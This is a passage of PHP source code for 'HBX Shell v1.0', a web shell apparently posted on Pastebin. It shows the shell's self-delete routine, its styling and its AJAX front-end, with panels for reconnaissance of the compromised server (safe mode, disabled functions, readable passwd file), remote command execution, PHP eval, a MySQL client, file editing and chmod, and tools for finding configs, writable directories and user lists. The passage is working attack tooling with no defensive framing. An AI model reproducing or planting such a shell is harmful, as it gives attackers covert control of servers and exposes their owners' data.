  675. echo "<center><h1><a href='#' onClick=\"sendRequest('kill&dokill=1')\">[ Confirm kill ]</a></h1></center>";
  676. } else {
  677. if(unlink(basename($_SERVER['PHP_SELF']))) echo "<center>Thanks for using HBX shell! - HomicidalMortician</center>";
  678. else echo "<center><font color='red'>Warning: Failed to delete shell</font></center>";
  679. }
  680. }
  681. ?>
  682.  
  683. <html>
  684. <head>
  685. <title>HBX Shell v1.0 | BETA</title>
  686. <?php
  687. echo "
  688. <style>
  689. body {
  690. background-color: $shell[Background];
  691. font-size: 12px;
  692. color: $shell[Primary_Color];
  693. }
  694.  
  695. a {
  696. text-decoration: none;
  697. color: $shell[Link_Color];
  698. }
  699.  
  700. td {
  701. border-color: $shell[Border];
  702. }
  703.  
  704. a:hover {
  705. color: $shell[Hover];
  706. }
  707.  
  708. input {
  709. background-color: $shell[Input_BG];
  710. color: $shell[Input_Color];
  711. border: 1px solid $shell[Input_Border];
  712. }
  713.  
  714. textarea {
  715. background-color: $shell[Textarea_BG];
  716. color: $shell[Textarea_Color];
  717. font-family: $shell[Textarea_Font];
  718. border: 1px solid $shell[Textarea_Border];
  719. }
  720.  
  721. select {
  722. background-color: #222222;
  723. color: #3388ff;
  724. }
  725.  
  726. #header {
  727. font-size: 12px;
  728. background-color: #000000;
  729. padding-left: 2px;
  730. color: $shell[Header_Color];
  731. font-family: $shell[Header_Font]
  732. }
  733.  
  734. #browse {
  735. background-color: #000000;
  736. color: #FFFFFF;
  737. border-bottom: 1px solid $shell[Border];
  738. text-align: center;
  739. padding-bottom: 5px;
  740. }
  741.  
  742. #browse a {
  743. color: #3388ff;
  744. text-decoration: none;
  745. padding-left: 30px;
  746. font-size: 12px;
  747. font-family: Arial, Helvetica, sans-serif;
  748. }
  749.  
  750. #browse a:hover {
  751. color: #00FF00;
  752. text-decoration: underline;
  753. }
  754.  
  755. #shell {
  756. font-family: $shell[Font];
  757. border-bottom: 1px solid $shell[Border];
  758. font-size: 12px;
  759. padding-bottom: 20px;
  760. background-color: #000000;
  761. }
  762.  
  763. #shell td {
  764. padding-right: 10px;
  765. font-size: 14px;
  766. }
  767.  
  768. #shell tr:hover {
  769. background-color: #333333;
  770. }
  771.  
  772. #back {
  773. float: right;
  774. }
  775.  
  776. #back a{
  777. font-size: 10px;
  778. }
  779.  
  780. .info td {
  781. padding-right: 5px;
  782. }
  783.  
  784. #cmd textarea {
  785. background-color: $shell[CMD_BG];
  786. color: $shell[CMD_COLOR];
  787. font-family: $shell[CMD_FONT];
  788. border: 1px solid $shell[CMD_BORDER];
  789. }
  790.  
  791. #cmd input {
  792. background-color: $shell[CMD_BG];
  793. color: $shell[CMD_COLOR];
  794. border: 1px solid $shell[CMD_BORDER];
  795. }
  796. </style>"; ?>
  797.  
  798. <script>
  799. var m_history=[];
  800. var current=0;
  801. var sz=0;
  802.  
  803. function history_back(last) {
  804. m_history=[last];
  805. document.getElementById("back").innerHTML="<a href='#' onClick=\"sendRequest('"+m_history[0]+"')\">[ Back ]</a>";
  806. }
  807.  
  808. function show(id) {
  809. var opt=document.getElementById(id).style.display;
  810. if(opt=='none') document.getElementById(id).style.display='block';
  811. else document.getElementById(id).style.display='none';
  812. }
  813.  
  814. function checkKey(e,req) {
  815. var request='';
  816. if(window.event) key=e.keyCode;
  817. else if(e.which) key=e.which;
  818. if(key==13) {
  819. if(req=='exec') {
  820. req+='&cmd='+document.getElementById('cmd_in').value;
  821. sendRequest(req,'cmd');
  822. }
  823. else if(req=='create') {
  824. req+="&db="+document.getElementById('new_database').value;
  825. sendRequest(req);
  826. }
  827. else if(req=='createtbl') {
  828. req="create";
  829. req+="&db="+document.getElementById('sql_db').value+"&tbl="+document.getElementById('new_database').value;
  830. sendRequest(req);
  831. } else if(req=='sql_query') {
  832. req="query&q="+encodeURIComponent(document.getElementById('sql_in').value);
  833. sendRequest(req,'sqlQuery');
  834. } else {
  835. sendRequest(req);
  836. }
  837. }
  838. }
  839.  
  840. function loadInput(input,params) {
  841. if(input=='rename') {
  842. document.getElementById('shell').innerHTML="Renaming file "+params+"<br /><input type='text' value='' id='rnfile'> <a href='#' onClick=\"sendRequest('rename&file="+params+"','rename')\">[ Rename ]</a>";
  843. }
  844. if(input=='chmod') {
  845. document.getElementById('shell').innerHTML="Changing perms for "+params+"<br /><input type='text' value='666' id='chfile'> <a href='#' onClick=\"sendRequest('chmod&file="+params+"','chmod')\">[ Chmod ]</a>";
  846. }
  847. if(input=='move') {
  848. document.getElementById('shell').innerHTML="Move file "+params+"<br /> to location: <input style='width: 500px' type='text' value='"+params+"' id='mvfile'> <a href='#' onClick=\"sendRequest('mv&file="+params+"','mvfile')\">[ Move ]</a>";
  849. }
  850. }
  851.  
  852. function sendRequest(request,option) {
  853. url_req='';
  854. var xmlHTTP=1;
  855. if(window.XMLHttpRequest) xmlHTTP=new XMLHttpRequest();
  856. else if(window.ActiveXObject) xmlHTTP=new ActiveXObject('Microsoft.XMLHTTP');
  857. else alert('Get a new browser.');
  858. url_req='s='+request;
  859. if(option=='sqlsave') {
  860. var str='';
  861. var elem=document.getElementById('sqlvals').elements;
  862. for(var i=0;i<elem.length;i++) {
  863. if(i%2==0)
  864. str+="&"+encodeURIComponent(elem[i].value)+"=";
  865. else
  866. str+=encodeURIComponent(elem[i].value);
  867. }
  868. str+="&update=1";
  869. url_req+=str;
  870. }
  871. if(option=='save') {
  872. data=encodeURIComponent(document.getElementById('file').value)
  873. url_req+="&data="+data;
  874. }
  875. if(option=='rename') {
  876. url_req+="&rname="+document.getElementById('rnfile').value;
  877. }
  878. if(option=='chmod') {
  879. url_req+="&mod="+document.getElementById('chfile').value;
  880. }
  881. if(option=='mvfile') {
  882. url_req+="&location="+document.getElementById('mvfile').value;
  883. }
  884. if(option=='eval') {
  885. url_req+="&e="+encodeURIComponent(document.getElementById('eval').value);
  886. }
  887. if(option=='sqllogin') {
  888. url_req+="&host="+document.getElementById('sql_host').value+"&user="+document.getElementById('sql_user').value+"&pass="+encodeURIComponent(document.getElementById('sql_pass').value); //For passwords with pesky post characters.
  889. }
  890. if(option=='insert') {
  891. var str='';
  892. var elem=document.getElementById('vals').elements;
  893. for(var i=0;i<elem.length;i++) {
  894. if(i%2==0)
  895. str+="&"+escape(elem[i].value)+"=";
  896. else
  897. str+=escape(elem[i].value);
  898. }
  899. str+="&update=1";
  900. url_req+=str;
  901. }
  902. xmlHTTP.open('POST','?');
  903. xmlHTTP.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
  904. xmlHTTP.send(url_req);
  905. xmlHTTP.onreadystatechange=function() {
  906. if(xmlHTTP.readyState==4) {
  907. history_back(request);
  908. if(option=='cmd') {
  909. document.getElementById('cmd_in').value='Executing...';
  910. document.getElementById('cmd_out').innerHTML=xmlHTTP.responseText;
  911. document.getElementById('cmd_in').value='';
  912. }
  913. else if(option=='eval') {
  914. document.getElementById('eval_out').style.display='block';
  915. document.getElementById('eval_out').value=xmlHTTP.responseText;
  916. }
  917. else if(option=='sqlQuery') {
  918. document.getElementById('sql_out').style.display='block';
  919. document.getElementById('sql_in').value='Executing query...';
  920. document.getElementById('sql_out').value=xmlHTTP.responseText;
  921. document.getElementById('sql_in').value='';
  922. }
  923. else {
  924. document.getElementById('shell').innerHTML=xmlHTTP.responseText;
  925. }
  926. }
  927. }
  928. }
  929.  
  930. </script>
  931.  
  932. </head>
  933.  
  934. <body>
  935. <?php
  936. echo "
  937. <div id='header'>
  938. Shell: <font color='#737a85'><b>$location</b></font><br />
  939. Server: <font color='#ff4422'>$remote_addr ($remote_host)</font><br />
  940. Local: <font color='#737a85'><b>$local_addr ($local_host)</b></font><br />
  941. Open_BaseDir: $open_basedir<br />
  942. Safe Mode: $safe_mode<br />
  943. MySQL: $mysql_on<br />
  944. Disabled functions: $disabled_functions<br />
  945. Shell status: <u><font color='#ff4422'>Viewing files</font></u><br />
  946. <div id='info' style='display: none;'>
  947. Disk: $disk_free of $disk_space<br />
  948. Software: $software<br />
  949. PHP Version: $php_ver<br />
  950. Uname: $uname<br />
  951. Read passwd: $read_passwd<br />
  952. cURL: $curl_on<br />
  953. Remote includes: $includes<br />
  954. </div>
  955. <a href='#' onClick=\"show('info')\">[ Show/Hide More Information ]</a>
  956. <br /><br />
  957. </div>
  958. <div id='browse'>
  959. <a href='#' onClick=\"sendRequest('view')\">[ Files ]</a>
  960. <a href='#' onClick=\"sendRequest('cmd')\">[ Console ]</a>
  961. <a href='#' onClick=\"sendRequest('eval')\">[ Eval ]</a>
  962. <a href='#' onClick=\"sendRequest('sql')\">[ MySQL ]</a>
  963. <a href='#' onClick=\"sendRequest('kill')\">[ Kill Shell ]</a>
  964. </div>
  965. <div id='back'></div>
  966. <br />
  967. <br />
  968. <div id='shell'>
  969. <script>sendRequest('view')</script>
  970. </div><br /><br />
  971.  
  972. <table width='100%' style='font-size: 12px; text-align: center; margin: auto;' cols='2' cellpadding='5'>
  973. <tr><td colspan='2'>[ Execute CMD ]</td></tr>
  974. <tr><td colspan='2'><input type='text' value='whoami' style='width: 75%'></td></tr>
  975. <tr><td>[ Quick Commands ]</td><td>[ Tools ]</td></tr>
  976. <tr><td><select>
  977. <option name=''>Select a command</option>
  978. <option name='configs'>Current directory</option>
  979. <option name='sql'>Open ports</option>
  980. </select>
  981. </td>
  982. <td><select>
  983. <option name=''>Select a tool</option>
  984. <option name=''>---------------------------------------------------------------------</option>
  985. <option name='configs'>Find configs</option>
  986. <option name='sql'>Find SQL files</option>
  987. <option name='sql'>Find writable files</option>
  988. <option name='sql'>Find writable dirs</option>
  989. <option name='sql'>---------------------------------------------------------------------</option>
  990. <option name='sql'>Retrieve list of enumerated users</option>
  991. <option name='sql'>Dump tables and columns (schema)</option>
  992. </select>
  993. </td></tr>
  994. <tr><td>[ Upload file ]</td><td>[ Download file ]</td></tr>
  995. <tr><td>[ Enter directory ]</td><td>[ Edit file ]</td></tr>
  996. </table>
  997. </body>
  998. </html>";
  999. ob_end_flush();
  1000. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!